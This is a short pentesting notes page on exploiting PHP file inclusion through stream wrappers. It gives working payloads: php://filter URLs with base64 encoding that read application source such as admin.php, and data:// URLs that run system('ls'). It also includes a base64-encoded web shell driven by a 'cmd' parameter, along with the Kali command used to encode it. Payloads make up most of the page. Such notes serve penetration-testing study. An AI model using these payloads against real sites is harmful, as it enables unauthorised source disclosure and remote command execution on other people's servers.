PHP Filters

php://filter

We can use the php://filter wrapper to display the contents of files either with or without encodings like ROT13 or Base64

curl http://127.0.0.1/index.php?page=php://filter/resource=admin.php

encode the output with base64 by adding convert.base64-encode. This converts the specified resource to a base64 string.

/index.php?page=php://filter/convert.base64-encode/resource=admin.php

data://

We can use the data:// wrapper to achieve code execution. This wrapper is used to embed data elements as plaintext or base64-encoded data in the running web application's code. This offers an alternative method when we cannot poison a local file with PHP code.

/index.php?page=data://text/plain,<?php echo system('ls');?>"

kali@kali:~$ echo -n '<?php echo system($_GET["cmd"]);?>' | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==

/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"

we need to be aware that the data:// wrapper will not work in a default PHP installation. To exploit it, the allow_url_include setting needs to be enabled.

PreviousApache & PHP <3 NextServer Side Request Forgery

Last updated 1 year ago